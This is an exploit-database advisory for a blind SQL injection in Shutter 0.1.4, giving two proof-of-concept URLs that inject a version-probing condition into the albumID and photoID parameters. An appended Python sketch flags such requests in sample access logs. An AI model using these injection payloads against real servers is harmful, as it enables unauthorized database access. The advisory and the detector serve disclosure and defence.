Shutter 0.1.4 Blind SQL Injection Vulnerability

2010-03-19T00:00:00
ID 1337DAY-ID-11366
Type zdt
Reporter Blake
Modified 2010-03-19T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
===============================================
Shutter 0.1.4 Blind SQL Injection Vulnerability
===============================================

# Exploit Title: Shutter 0.1.4 Blind SQL Injection
# Date: March 18, 2010
# Author: Blake
# Software Link: http://sourceforge.net/projects/shutter-php/files/shutter/v0.1.4/shutter_0.1.4.zip/download
# Version: version 0.1.4
 
The albumID and photoID parameters are vulnerable to SQL Injection.
 
POC:
http://server/shutter/admin.html?albumID=2%20and%20substring%28@@version,1,1%29=5
http://server/shutter/admin.html?albumID=2&photoID=5%20and%20substring%28@@version,1,1%29=5
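
Detection sketch (added example, not part of the original advisory or of the Shutter code): albumID and photoID are assumed to be integer IDs, so an access log can be checked for requests where either parameter decodes to anything else. The log lines are constructed samples in Common Log Format, and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory names as injectable; assumed to be plain integer IDs.
ID_PARAMS = {"albumID", "photoID"}
INT_RE = re.compile(r"\d{1,10}")

# Request field of a Common Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Mar/2010:10:00:01 +0000] '
    '"GET /shutter/admin.html?albumID=2 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [18/Mar/2010:10:00:07 +0000] '
    '"GET /shutter/admin.html?albumID=2%20and%20substring%28@@version,1,1%29=5 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [18/Mar/2010:10:00:09 +0000] '
    '"GET /shutter/admin.html?albumID=2&photoID=5%20and%20substring%28@@version,1,1%29=4 HTTP/1.1" 200 1833',
    '192.0.2.10 - - [18/Mar/2010:10:00:12 +0000] '
    '"GET /shutter/admin.html?albumID=2&photoID=5 HTTP/1.1" 200 5120',
]


def suspicious_params(target):
    """Return [(name, decoded_value)] for ID parameters that are not plain integers."""
    hits = []
    # parse_qsl percent-decodes values, so %20 / %28 / %29 encoding does not hide content.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in ID_PARAMS and not INT_RE.fullmatch(value):
            hits.append((name, value))
    return hits


def scan(log_lines):
    """Return [(line_number, parameter, decoded_value)] for every flagged request."""
    findings = []
    for lineno, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line this pattern understands
        for name, value in suspicious_params(match.group(1)):
            findings.append((lineno, name, value))
    return findings


if __name__ == "__main__":
    for lineno, name, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: {name} is not an integer: {value!r}")
```

The same integer-only check, applied in the application before the value reaches the query (or replaced by a parameterized query), is the corresponding mitigation.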


